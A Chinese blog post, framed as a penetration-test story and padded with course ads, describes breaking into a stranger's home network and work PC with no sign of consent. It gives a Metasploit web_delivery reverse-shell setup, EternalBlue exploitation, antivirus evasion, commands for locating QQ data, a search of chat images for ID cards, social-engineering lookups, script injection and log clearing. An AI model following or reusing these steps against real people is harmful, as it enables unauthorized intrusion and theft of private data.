最全渗透测试 从记一次无线渗透_csploit下载,2024年最新字节软件测试高级岗

img
img

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以戳这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

之后又进行了一波中间人攻击,但从后台流量情况来看发现这家伙一直在看电视(M321是一台华为盒子),很少玩电脑,中间人攻击对苹果手机无效(之前用同事的手机测试过,苹果手机会直接断网),这样一来截取到的数据包非常少,没有可以利用的信息。

渗透工具测试

移动工具渗透无果,现在只能上PC工具了。这个内网有两个网段192.168.0.0/24和192.168.1.0/24,利用ms17-010扫描工具试一波~,运气比较好发现刚刚那台联想PC存在该漏洞

利用之前搭好的win2003 NAS工具包和kali进行漏洞利用,永恒之蓝工具能利用成功,说明漏洞确实存在。

但是运用Doublepulsar,导入dll执行文件失败,原因未知。。。

最后转战kali

meterpreter好像已经有了ms17-010的exploit脚本,对meterpreter直接升级,利用ms17_010_eternalblue 直接获得webshell

在目录中发现了360,可以猜测之前NAS工具没有利用成功应该是360起了一定的防护作用,同时也说明了meterpreter有一定程度上的免杀作用。

shell获取到了但是不能利用meterpreter模块,可能是360的缘故shell连接也不稳定,执行一两个命令就没有回显了。于是到网上找到了一篇免杀文章“Metasploit后门免杀模块之绕过某安全防护”文章链接https://bbs.ichunqiu.com/thread-20934-1-1.html 里面有视频教程。

免杀思路:

可能是因为性能原因,同一台kali上开两个msf实验时msf运行非常慢 最后也不能成功,于是用了两台kali。

kali-1上利用msf生成免杀powershell代码,同时开启监听

msfconsle  
  
use exploit/multi/script/web_delivery  
  
set target 2  
  
set payload windows/meterpreter/reverse_tcp  
  
set LHOST [本地ip]  
  
set URIPATH /  
  
exploit /

**第二步、**kali-2上利用msf中的ms17-010获取靶机一个不稳定的shell,并执行免杀powershell命令(msf的百年套路就不写了)。

执行完后kali-1上就获得了稳定的meterpreter链接:

获得了meterpreter,可以提升到system权限但是不能截屏。继续工作,创建账号开通3389,但是远程链接任不能用,查看3389端口确实开了呀~~~心塞(应该是防火墙拦截了)。

只能另辟蹊径。回想一下之前的目的是要找到宽带手机号码和密码,现在已经获得了system shell权限但是不能远程控制,那就只能翻翻敏感目录了,目标瞄向QQ、wechat和用户桌面文件。

用meterpreter链接一个shell

查看盘符

Diskpart

LIST VOLUME

查看qq号码和目录:

dir /s /a c:\ | find “Tencent\Users\”

获得qq号~

一个男的,名字刚好和wifi名称匹配,哎不想和男的聊算了不加他。。。

社攻一下,没有发现密码泄露…可能是社工库太菜了…

查看wechat号和目录:dir /s /a c:\ | find “\wechatdata\WeChat Files”,没有结果。此人居然没有用电脑微信。。。

找到了qq的目录,我们可以翻一下他的聊天图片,看会不会有身份证之类的敏感图片

qq的大部分的图片存放在下面3个目录中

..\..\Tencent Files\[qq号]\Image\C2C #一对一聊天图片目录  
  
..\..\Tencent Files\[qq号]\Image\Group #群聊图片目录  
  
..\..\Tencent Files\[qq号]\Video #视频图片目录

利用merterpreter下载这些文件,要注意在merterpreter中切换目录好像只能一级一级切换,在切换带有空格名称的目录时要用””符号。

翻了一波图片,结果只发现一张貌似远程桌面的图片

既然用过远程那我们看一下远程记录缓存文件,可惜是空的…远程IP也ping不通

然后看一下Desktop,这绝对是一台公司的电脑,貌似是一个链家的经理

最后做个脚本提示该用户改wifi的密码吧

通过csploit中间人攻击利用脚本注入模块,下面是本地效果演示:

最后每当用户浏览http网站时浏览器便会自动弹出以下提示(对https的网站无效)。

渗透到此就结束吧。清除日志。

总结:

1、自己家的wifi千万不要用万能钥匙共享。

2、记得打好补丁,特别是445的,内网中Windows最好撸进去的就是445了

3、定期检查自己的电脑是不是中远控了

如果你也想学习:黑客&网络安全的SQL攻防

在这里领取:

img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化的资料的朋友,可以戳这里获取

7443620)]

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化的资料的朋友,可以戳这里获取

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值